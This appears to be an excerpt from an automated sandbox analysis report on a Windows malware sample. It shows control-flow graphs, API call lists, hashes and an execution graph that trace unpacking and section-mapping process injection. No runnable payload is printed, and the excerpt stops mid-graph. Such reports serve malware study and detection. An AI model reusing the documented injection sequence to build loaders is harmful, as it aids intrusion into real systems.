                                                            control_flow_graph 0 3cb003c-3cb0047 1 3cb0049 0->1 2 3cb004c-3cb0263 call 3cb0a3f call 3cb0e0f call 3cb0d90 VirtualAlloc 0->2 1->2 17 3cb028b-3cb0292 2->17 18 3cb0265-3cb0289 call 3cb0a69 2->18 20 3cb02a1-3cb02b0 17->20 22 3cb02ce-3cb03c2 VirtualProtect call 3cb0cce call 3cb0ce7 18->22 20->22 23 3cb02b2-3cb02cc 20->23 29 3cb03d1-3cb03e0 22->29 23->20 30 3cb0439-3cb04b8 VirtualFree 29->30 31 3cb03e2-3cb0437 call 3cb0ce7 29->31 33 3cb04be-3cb04cd 30->33 34 3cb05f4-3cb05fe 30->34 31->29 38 3cb04d3-3cb04dd 33->38 35 3cb077f-3cb0789 34->35 36 3cb0604-3cb060d 34->36 42 3cb078b-3cb07a3 35->42 43 3cb07a6-3cb07b0 35->43 36->35 39 3cb0613-3cb0637 36->39 38->34 41 3cb04e3-3cb0505 38->41 46 3cb063e-3cb0648 39->46 50 3cb0517-3cb0520 41->50 51 3cb0507-3cb0515 41->51 42->43 44 3cb086e-3cb08be LoadLibraryA 43->44 45 3cb07b6-3cb07cb 43->45 55 3cb08c7-3cb08f9 44->55 47 3cb07d2-3cb07d5 45->47 46->35 48 3cb064e-3cb065a 46->48 52 3cb07d7-3cb07e0 47->52 53 3cb0824-3cb0833 47->53 48->35 54 3cb0660-3cb066a 48->54 56 3cb0526-3cb0547 50->56 51->56 57 3cb07e2 52->57 58 3cb07e4-3cb0822 52->58 60 3cb0839-3cb083c 53->60 59 3cb067a-3cb0689 54->59 61 3cb08fb-3cb0901 55->61 62 3cb0902-3cb091d 55->62 63 3cb054d-3cb0550 56->63 57->53 58->47 64 3cb068f-3cb06b2 59->64 65 3cb0750-3cb077a 59->65 60->44 66 3cb083e-3cb0847 60->66 61->62 68 3cb05e0-3cb05ef 63->68 69 3cb0556-3cb056b 63->69 70 3cb06ef-3cb06fc 64->70 71 3cb06b4-3cb06ed 64->71 65->46 72 3cb084b-3cb086c 66->72 73 3cb0849 66->73 68->38 74 3cb056f-3cb057a 69->74 75 3cb056d 69->75 76 3cb074b 70->76 77 3cb06fe-3cb0748 70->77 71->70 72->60 73->44 78 3cb059b-3cb05bb 74->78 79 3cb057c-3cb0599 74->79 75->68 76->59 77->76 84 3cb05bd-3cb05db 78->84 79->84 84->63
                                                            APIs
                                                            • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 03CB024D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2371154176.0000000003CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03CB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_3cb0000_tcgcuca.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID: cess$kernel32.dll
                                                            • API String ID: 4275171209-1230238691
                                                            • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                            • Instruction ID: 0a9ea90a7265e923763f18d6291cf04036e9aa11dd628b355b9065f872a1ec4e
                                                            • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                            • Instruction Fuzzy Hash: 8C526875A01229DFDB64CF58C984BADBBB1BF09304F1480D9E94DEB251DB30AA85DF14
                                                            Function 0211F136 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 484 211f136-211f14f 485 211f151-211f153 484->485 486 211f155 485->486 487 211f15a-211f166 CreateToolhelp32Snapshot 485->487 486->487 488 211f176-211f183 Module32First 487->488 489 211f168-211f16e 487->489 490 211f185-211f186 call 211edf5 488->490 491 211f18c-211f194 488->491 489->488 494 211f170-211f174 489->494 495 211f18b 490->495 494->485 494->488 495->491
                                                            APIs
                                                            • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0211F15E
                                                            • Module32First.KERNEL32(00000000,00000224), ref: 0211F17E
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2370964551.0000000002118000.00000040.00000020.00020000.00000000.sdmp, Offset: 02118000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_2118000_tcgcuca.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CreateFirstModule32SnapshotToolhelp32
                                                            • String ID:
                                                            • API String ID: 3833638111-0
                                                            • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                            • Instruction ID: 6d7e7dc7e6376854a55a5a41aaaf399d4707f31a4729f9f5fc8eb6bff8b2a30f
                                                            • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                            • Instruction Fuzzy Hash: 89F096322407106FD7203BF9D88CB6E76F8EF49625F140638E646D15C0DB70E8464A61
                                                            Function 03CB0E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 497 3cb0e0f-3cb0e24 SetErrorMode * 2 498 3cb0e2b-3cb0e2c 497->498 499 3cb0e26 497->499 499->498
                                                            APIs
                                                            • SetErrorMode.KERNELBASE(00000400,?,?,03CB0223,?,?), ref: 03CB0E19
                                                            • SetErrorMode.KERNELBASE(00000000,?,?,03CB0223,?,?), ref: 03CB0E1E
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2371154176.0000000003CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03CB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_3cb0000_tcgcuca.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorMode
                                                            • String ID:
                                                            • API String ID: 2340568224-0
                                                            • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                            • Instruction ID: a3eb4575dd6eacc27d6bcc256da806dd2ce9240edfe1d86a05db2bdd7b86cf8e
                                                            • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                            • Instruction Fuzzy Hash: 5CD0123114512877D7002A94DC09BCEBB1CDF05B62F048011FB0DDD080C770964046E5
                                                            Function 00401918 Relevance: 1.3, APIs: 1, Instructions: 57sleepCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 592 401918-401943 597 401946-40197b call 4011b7 Sleep call 40143e 592->597 598 40193a-40193f 592->598 606 40198a-4019d3 call 4011b7 597->606 607 40197d-401985 call 401538 597->607 598->597 607->606
                                                            APIs
                                                            • Sleep.KERNELBASE(00001388), ref: 00401966
                                                              • Part of subcall function 00401538: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                                              • Part of subcall function 00401538: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                                              • Part of subcall function 00401538: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2369873187.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_tcgcuca.jbxd
                                                            Similarity
                                                            • API ID: Section$CreateDuplicateObjectSleepView
                                                            • String ID:
                                                            • API String ID: 1885482327-0
                                                            • Opcode ID: be810bd81fc1513bf14dac74237aa616a3cfbc48422f9378a192f31e1e69cca3
                                                            • Instruction ID: 41df8370e0b5f9a47a14a91e784646d83bdfa422f97ac69dcfec837627d5bcb0
                                                            • Opcode Fuzzy Hash: be810bd81fc1513bf14dac74237aa616a3cfbc48422f9378a192f31e1e69cca3
                                                            • Instruction Fuzzy Hash: 6D018CF520C148E7EB016A948DB1EBA36299B45324F300233B647B91F4C57C8A03E76F
                                                            Function 00401924 Relevance: 1.3, APIs: 1, Instructions: 50sleepCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 621 401924-401943 625 401946-40197b call 4011b7 Sleep call 40143e 621->625 626 40193a-40193f 621->626 634 40198a-4019d3 call 4011b7 625->634 635 40197d-401985 call 401538 625->635 626->625 635->634
                                                            APIs
                                                            • Sleep.KERNELBASE(00001388), ref: 00401966
                                                              • Part of subcall function 00401538: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                                              • Part of subcall function 00401538: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                                              • Part of subcall function 00401538: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2369873187.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_tcgcuca.jbxd
                                                            Similarity
                                                            • API ID: Section$CreateDuplicateObjectSleepView
                                                            • String ID:
                                                            • API String ID: 1885482327-0
                                                            • Opcode ID: 3ad2d4b3403b833ed421c634174be831538fe621ff724946387ec8f91c54f5fa
                                                            • Instruction ID: 34fc3aff5e218d4630d956a4f9c4c41b7245144a44faa4fd8074b33eba8f9d72
                                                            • Opcode Fuzzy Hash: 3ad2d4b3403b833ed421c634174be831538fe621ff724946387ec8f91c54f5fa
                                                            • Instruction Fuzzy Hash: 43017CF5208145E7EB015A948DB0EBA26299B45314F300237B617BA1F4C57D8602E76F
                                                            Function 0211EDF5 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 0211EE46
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2370964551.0000000002118000.00000040.00000020.00020000.00000000.sdmp, Offset: 02118000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_2118000_tcgcuca.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID:
                                                            • API String ID: 4275171209-0
                                                            • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                            • Instruction ID: d587859e412b03befa0c734be7371c606c6f48b124b7dc1b0376730bb37faf65
                                                            • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                            • Instruction Fuzzy Hash: 2A113979A40208EFDB01DF98C985E99BBF5AF08750F1580A4F9489B361D371EA90DF80
                                                            Function 00401941 Relevance: 1.3, APIs: 1, Instructions: 44sleepCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Sleep.KERNELBASE(00001388), ref: 00401966
                                                              • Part of subcall function 00401538: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                                              • Part of subcall function 00401538: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                                              • Part of subcall function 00401538: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2369873187.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_tcgcuca.jbxd
                                                            Similarity
                                                            • API ID: Section$CreateDuplicateObjectSleepView
                                                            • String ID:
                                                            • API String ID: 1885482327-0
                                                            • Opcode ID: 6acc595331c6a8be6e6657ef398eef7c869974a8ecae4d1fde63dfd35a725e44
                                                            • Instruction ID: 53d82b158b021bc4b6cde56962adc0b8c8d23177238c0d6ee964112a53f005ae
                                                            • Opcode Fuzzy Hash: 6acc595331c6a8be6e6657ef398eef7c869974a8ecae4d1fde63dfd35a725e44
                                                            • Instruction Fuzzy Hash: 38F0AFB6308249F7DB01AA908DB1EBA36299B54315F300633B617B91F5C57C8A12E76F
                                                            Function 00401954 Relevance: 1.3, APIs: 1, Instructions: 43sleepCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Sleep.KERNELBASE(00001388), ref: 00401966
                                                              • Part of subcall function 00401538: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                                              • Part of subcall function 00401538: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                                              • Part of subcall function 00401538: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2369873187.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_tcgcuca.jbxd
                                                            Similarity
                                                            • API ID: Section$CreateDuplicateObjectSleepView
                                                            • String ID:
                                                            • API String ID: 1885482327-0
                                                            • Opcode ID: 0dfbee2e4a1c62836b2bd3ba6284fddb5b43d5507a7098400a51ac80bc720613
                                                            • Instruction ID: f7568a5a22988f4b084f7ac8228f9b89e575eda69d31bfffabc36cd9cbe45c64
                                                            • Opcode Fuzzy Hash: 0dfbee2e4a1c62836b2bd3ba6284fddb5b43d5507a7098400a51ac80bc720613
                                                            • Instruction Fuzzy Hash: BDF0C2B6208144F7DB019AA18DB1FBA36299B44314F300233BA17B90F5C67C8612E76F
                                                            Function 0040194C Relevance: 1.3, APIs: 1, Instructions: 42sleepCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Sleep.KERNELBASE(00001388), ref: 00401966
                                                              • Part of subcall function 00401538: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                                              • Part of subcall function 00401538: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                                              • Part of subcall function 00401538: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2369873187.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_tcgcuca.jbxd
                                                            Similarity
                                                            • API ID: Section$CreateDuplicateObjectSleepView
                                                            • String ID:
                                                            • API String ID: 1885482327-0
                                                            • Opcode ID: f575feb9a37452ed4573e207967fb92b714552aa85f9b6ebf0a13cec3e485039
                                                            • Instruction ID: 9d6088553fbd849a34ffa1589a5f9bffd683413c7e042594889390f4c4f3f426
                                                            • Opcode Fuzzy Hash: f575feb9a37452ed4573e207967fb92b714552aa85f9b6ebf0a13cec3e485039
                                                            • Instruction Fuzzy Hash: 08F0C2B2208144F7DB019A958DA0FBA36299B44314F300633B617B91F5C57C8A02E72F

                                                            Execution Graph

                                                            Execution Coverage:1.3%
                                                            Dynamic/Decrypted Code Coverage:0%
                                                            Signature Coverage:38.8%
                                                            Total number of Nodes:121
                                                            Total number of Limit Nodes:20
                                                            execution_graph 35140 7ff6a78d5fd0 35149 7ff6a794cfe0 RtlAllocateHeap RtlRestoreThreadPreferredUILanguages 35140->35149 35143 7ff6a78d6049 35144 7ff6a78da080 RtlAllocateHeap RtlRestoreThreadPreferredUILanguages 35143->35144 35145 7ff6a78d91d2 35143->35145 35147 7ff6a7956f90 RtlRestoreThreadPreferredUILanguages 35143->35147 35150 7ff6a78d9290 RtlAllocateHeap 35143->35150 35151 7ff6a7932350 35143->35151 35155 7ff6a78e0470 RtlAllocateHeap RtlRestoreThreadPreferredUILanguages 35143->35155 35144->35143 35147->35143 35149->35143 35150->35143 35152 7ff6a7932372 35151->35152 35153 7ff6a7932483 CreateFileW 35152->35153 35154 7ff6a7932509 35152->35154 35153->35152 35154->35143 35155->35143 35174 7ff6a78d584b 35175 7ff6a78d5856 35174->35175 35177 7ff6a78d5750 35174->35177 35175->35177 35187 7ff6a792cfe0 35175->35187 35182 7ff6a78e3460 35177->35182 35194 7ff6a78e62a0 35177->35194 35201 7ff6a78ee1d0 35177->35201 35209 7ff6a7902a60 RtlAllocateHeap RtlRestoreThreadPreferredUILanguages 35177->35209 35183 7ff6a78e34da 35182->35183 35184 7ff6a78e3628 35183->35184 35186 7ff6a78e35a6 SleepEx 35183->35186 35210 7ff6a79326f0 35183->35210 35184->35177 35186->35183 35214 7ff6a7956cd0 35187->35214 35190 7ff6a792e19a 35191 7ff6a7956f90 RtlRestoreThreadPreferredUILanguages 35190->35191 35192 7ff6a792e1a9 35191->35192 35192->35177 35193 7ff6a792cffd 35193->35190 35218 7ff6a79571a0 35193->35218 35222 7ff6a78dea40 35194->35222 35196 7ff6a78e6576 FindCloseChangeNotification 35199 7ff6a78e62f3 35196->35199 35197 7ff6a78e66b6 35197->35177 35198 7ff6a7956f90 RtlRestoreThreadPreferredUILanguages 35198->35199 35199->35196 35199->35197 35199->35198 35200 7ff6a78e64da CreateMutexExA 35199->35200 35200->35199 35202 7ff6a78ee23c 35201->35202 35203 7ff6a78f2086 LoadLibraryA 35202->35203 35204 7ff6a78f2474 LoadLibraryA 35202->35204 35205 7ff6a78f2d81 35202->35205 35206 7ff6a78ee950 LoadLibraryA 35202->35206 35207 7ff6a78ee9fe LoadLibraryA 35202->35207 35208 7ff6a7950930 RtlAllocateHeap RtlRestoreThreadPreferredUILanguages 35202->35208 35203->35202 35204->35202 35205->35177 35206->35202 35207->35202 35208->35202 35209->35177 35211 7ff6a793271e 35210->35211 35212 7ff6a7932710 GetFileAttributesA 35211->35212 35213 7ff6a793272e 35211->35213 35212->35211 35213->35183 35215 7ff6a7956d2c 35214->35215 35216 7ff6a7956d10 RtlAllocateHeap 35215->35216 35217 7ff6a7956d3c 35215->35217 35216->35215 35217->35193 35219 7ff6a79571f8 35218->35219 35220 7ff6a79571e0 RtlAllocateHeap 35219->35220 35221 7ff6a7957208 35219->35221 35220->35219 35221->35193 35223 7ff6a78dea7c 35222->35223 35225 7ff6a78dfce4 35223->35225 35226 7ff6a7956cd0 RtlAllocateHeap 35223->35226 35227 7ff6a78dc380 RtlAllocateHeap RtlRestoreThreadPreferredUILanguages 35223->35227 35225->35199 35226->35223 35227->35223 35228 7ff6a79197e0 35229 7ff6a791982f 35228->35229 35230 7ff6a7919e48 35229->35230 35232 7ff6a7956a60 35229->35232 35233 7ff6a7956a73 35232->35233 35234 7ff6a7956b2c RtlAllocateHeap 35233->35234 35235 7ff6a7956cb8 35233->35235 35234->35233 35235->35229 35287 7ff6a78f3dba RtlAllocateHeap RtlAllocateHeap RtlRestoreThreadPreferredUILanguages 35317 7ff6a794cf70 RtlAllocateHeap 35290 7ff6a78db9f0 RtlAllocateHeap RtlRestoreThreadPreferredUILanguages 35156 7ff6a78e706b 35157 7ff6a78e6830 35156->35157 35158 7ff6a78e882a 35156->35158 35158->35157 35161 7ff6a7932800 35158->35161 35160 7ff6a78eb7d0 35162 7ff6a7932840 35161->35162 35163 7ff6a7933263 CloseHandle 35162->35163 35164 7ff6a79334b9 35162->35164 35165 7ff6a7932c61 FindCloseChangeNotification 35162->35165 35166 7ff6a7932f64 CloseHandle 35162->35166 35169 7ff6a7934a60 RtlRestoreThreadPreferredUILanguages 35162->35169 35170 7ff6a7956f90 35162->35170 35163->35162 35164->35160 35165->35162 35166->35162 35169->35162 35171 7ff6a7956fb9 35170->35171 35172 7ff6a7957163 RtlRestoreThreadPreferredUILanguages 35171->35172 35173 7ff6a795718c 35171->35173 35172->35171 35173->35162 35328 7ff6a794ed50 CloseHandle RtlAllocateHeap RtlRestoreThreadPreferredUILanguages 35297 7ff6a78d5710 10 API calls 35268 7ff6a79511a0 35270 7ff6a795122d 35268->35270 35269 7ff6a7951850 FindWindowW 35269->35270 35270->35269 35271 7ff6a7951c6a 35270->35271 35236 7ff6a78f41fb 35237 7ff6a78f43da 35236->35237 35238 7ff6a78f4206 35236->35238 35241 7ff6a78f4639 35237->35241 35243 7ff6a78f43e5 35237->35243 35239 7ff6a78f4551 35238->35239 35240 7ff6a78f4211 35238->35240 35245 7ff6a78f5ffa 35239->35245 35254 7ff6a78f4128 35239->35254 35240->35254 35261 7ff6a7952b60 35240->35261 35241->35239 35242 7ff6a78f4644 35241->35242 35242->35254 35267 7ff6a78f6040 IsDlgButtonChecked 35242->35267 35246 7ff6a7956f90 RtlRestoreThreadPreferredUILanguages 35243->35246 35243->35254 35248 7ff6a7956f90 RtlRestoreThreadPreferredUILanguages 35245->35248 35246->35254 35249 7ff6a78f600c 35248->35249 35251 7ff6a7956f90 RtlRestoreThreadPreferredUILanguages 35251->35254 35254->35251 35255 7ff6a7951fb0 35254->35255 35265 7ff6a78fa960 IsDlgButtonChecked IsDlgButtonChecked IsDlgButtonChecked 35254->35265 35266 7ff6a78fadf0 10 API calls 35254->35266 35257 7ff6a7951ff8 35255->35257 35256 7ff6a7952495 35256->35254 35257->35256 35258 7ff6a79521ad IsDlgButtonChecked 35257->35258 35259 7ff6a795231b IsDlgButtonChecked 35257->35259 35260 7ff6a79523ca IsDlgButtonChecked 35257->35260 35258->35257 35259->35257 35260->35257 35262 7ff6a7952bac 35261->35262 35263 7ff6a7952b90 IsDlgButtonChecked 35262->35263 35264 7ff6a7952bbc 35262->35264 35263->35262 35264->35254 35265->35254 35266->35254 35267->35254 35307 7ff6a78f4128 10 API calls 35272 7ff6a794fd80 35273 7ff6a794fda5 35272->35273 35274 7ff6a794fe43 AllocateAndInitializeSid 35273->35274 35275 7ff6a794ff29 35273->35275 35276 7ff6a794fdf0 CheckTokenMembership 35273->35276 35274->35273 35276->35273 35308 7ff6a7950200 OpenProcessToken

                                                            Executed Functions

                                                            Function 00007FF6A78EE1D0 Relevance: 75.5, APIs: 4, Strings: 37, Instructions: 3719COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2821199076.00007FF6A78D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6A78D0000, based on PE: true
                                                            • Associated: 00000007.00000002.2821173291.00007FF6A78D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000007.00000002.2821419598.00007FF6A795F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000007.00000002.2821495926.00007FF6A79C3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ff6a78d0000_5587.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: +huh$+ms$,huh$,huh$.\ $.\ $0VF$0VF$@h6m$@h6m$Bh$Bh$OW$PW$PW$Us,$Vs,$Vs,$e,_J$i;TK$i;TK$kz&t$kz&t${:M${:M$|%"{$|%"{$}f9$}f9$~Se $~Se $9Zv$9Zv$]4A$]4A$N4$N4
                                                            • API String ID: 0-1030705069
                                                            • Opcode ID: 572844be174cb15a91c660dd7b5535d1d5476b027ea7b0545326cb9f7832fd5f
                                                            • Instruction ID: b74380fec6b5ad7bee8543152d08dc9c8e208379388533849e0c01f224cfac8f
                                                            • Opcode Fuzzy Hash: 572844be174cb15a91c660dd7b5535d1d5476b027ea7b0545326cb9f7832fd5f
                                                            • Instruction Fuzzy Hash: A283D831E0B6CA8EFB748F7499847FD2A94AF45304F200576E61DCB799DF28E6848742
                                                            Function 00007FF6A7932800 Relevance: 28.7, APIs: 3, Strings: 13, Instructions: 673COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2821199076.00007FF6A78D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6A78D0000, based on PE: true
                                                            • Associated: 00000007.00000002.2821173291.00007FF6A78D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000007.00000002.2821419598.00007FF6A795F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000007.00000002.2821495926.00007FF6A79C3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ff6a78d0000_5587.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: =v}J$>v}J$>v}J$CRF)$DRF)$DRF)$DRF)$DRF)$H"=r$H"=r$e)v$e)v$e)v
                                                            • API String ID: 0-1464355950
                                                            • Opcode ID: 66a855c5490e70f4f285fcd749d377d533e58e29f2ef3daaa2f13a8fd682afbd
                                                            • Instruction ID: a61f638bb44303026d322996e50e31601fc02ce18def4108795551a6f668e4ff
                                                            • Opcode Fuzzy Hash: 66a855c5490e70f4f285fcd749d377d533e58e29f2ef3daaa2f13a8fd682afbd
                                                            • Instruction Fuzzy Hash: F652DE36E0E2478AEA748F19A08077EE694FB55750F24413BDA6DC7796CF3CE8408B49
                                                            Function 00007FF6A79511A0 Relevance: 25.1, APIs: 1, Strings: 13, Instructions: 583COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1273 7ff6a79511a0-7ff6a795122b 1274 7ff6a7951250-7ff6a7951256 1273->1274 1275 7ff6a795125c-7ff6a7951262 1274->1275 1276 7ff6a7951340-7ff6a7951346 1274->1276 1279 7ff6a7951268-7ff6a795126e 1275->1279 1280 7ff6a79513a0-7ff6a79513a6 1275->1280 1277 7ff6a795134c-7ff6a7951352 1276->1277 1278 7ff6a7951400-7ff6a7951406 1276->1278 1283 7ff6a7951358-7ff6a795135e 1277->1283 1284 7ff6a79514f9-7ff6a79514ff 1277->1284 1281 7ff6a795140c-7ff6a7951412 1278->1281 1282 7ff6a7951576-7ff6a795157c 1278->1282 1287 7ff6a7951274-7ff6a795127a 1279->1287 1288 7ff6a7951480-7ff6a7951486 1279->1288 1285 7ff6a79513ac-7ff6a79513b2 1280->1285 1286 7ff6a795153d-7ff6a7951543 1280->1286 1289 7ff6a7951418-7ff6a795141e 1281->1289 1290 7ff6a7951695-7ff6a795169b 1281->1290 1295 7ff6a79517c2-7ff6a79517c8 1282->1295 1296 7ff6a7951582-7ff6a7951588 1282->1296 1293 7ff6a7951364-7ff6a795136a 1283->1293 1294 7ff6a795161f-7ff6a7951625 1283->1294 1303 7ff6a7951767-7ff6a795176d 1284->1303 1304 7ff6a7951505-7ff6a795150b 1284->1304 1299 7ff6a79513b8-7ff6a79513be 1285->1299 1300 7ff6a7951649-7ff6a795164f 1285->1300 1291 7ff6a7951549-7ff6a795154f 1286->1291 1292 7ff6a79517a0-7ff6a79517a6 1286->1292 1301 7ff6a79515cd-7ff6a79515d3 1287->1301 1302 7ff6a7951280-7ff6a7951286 1287->1302 1297 7ff6a795148c-7ff6a7951492 1288->1297 1298 7ff6a79516c8-7ff6a79516ce 1288->1298 1323 7ff6a7951424-7ff6a795142a 1289->1323 1324 7ff6a7951a75-7ff6a7951a92 1289->1324 1327 7ff6a7951c24-7ff6a7951c31 1290->1327 1328 7ff6a79516a1-7ff6a79516a7 1290->1328 1309 7ff6a7951555-7ff6a795155b 1291->1309 1310 7ff6a7951801-7ff6a795184b call 7ff6a79562d0 * 3 1291->1310 1307 7ff6a79517ac-7ff6a79517b2 1292->1307 1308 7ff6a795122d-7ff6a7951246 1292->1308 1313 7ff6a7951a0a-7ff6a7951a19 1293->1313 1314 7ff6a7951370-7ff6a7951376 1293->1314 1321 7ff6a795162b-7ff6a7951631 1294->1321 1322 7ff6a7951bd2-7ff6a7951bfb call 7ff6a7935a30 1294->1322 1311 7ff6a79517ce-7ff6a79517d4 1295->1311 1312 7ff6a79518cf-7ff6a79518ed 1295->1312 1315 7ff6a795158e-7ff6a7951594 1296->1315 1316 7ff6a7951850-7ff6a79518ca FindWindowW 1296->1316 1329 7ff6a7951498-7ff6a795149e 1297->1329 1330 7ff6a7951aaf-7ff6a7951ac0 1297->1330 1331 7ff6a7951c36-7ff6a7951c48 1298->1331 1332 7ff6a79516d4-7ff6a79516da 1298->1332 1319 7ff6a7951a47-7ff6a7951a66 1299->1319 1320 7ff6a79513c4-7ff6a79513ca 1299->1320 1325 7ff6a7951c0b-7ff6a7951c1f 1300->1325 1326 7ff6a7951655-7ff6a795165b 1300->1326 1317 7ff6a7951b58-7ff6a7951bcd 1301->1317 1318 7ff6a79515d9-7ff6a79515df 1301->1318 1333 7ff6a795128c-7ff6a7951292 1302->1333 1334 7ff6a79518f2-7ff6a7951919 1302->1334 1335 7ff6a7951c4d-7ff6a7951c59 1303->1335 1336 7ff6a7951773-7ff6a7951779 1303->1336 1305 7ff6a7951b47-7ff6a7951b53 1304->1305 1306 7ff6a7951511-7ff6a7951517 1304->1306 1305->1274 1350 7ff6a795151d-7ff6a7951538 1306->1350 1351 7ff6a7951c5e-7ff6a7951c64 1306->1351 1307->1274 1337 7ff6a79517b8-7ff6a79517bd 1307->1337 1308->1274 1309->1274 1352 7ff6a7951561-7ff6a7951571 1309->1352 1310->1274 1311->1274 1338 7ff6a79517da-7ff6a79517fc 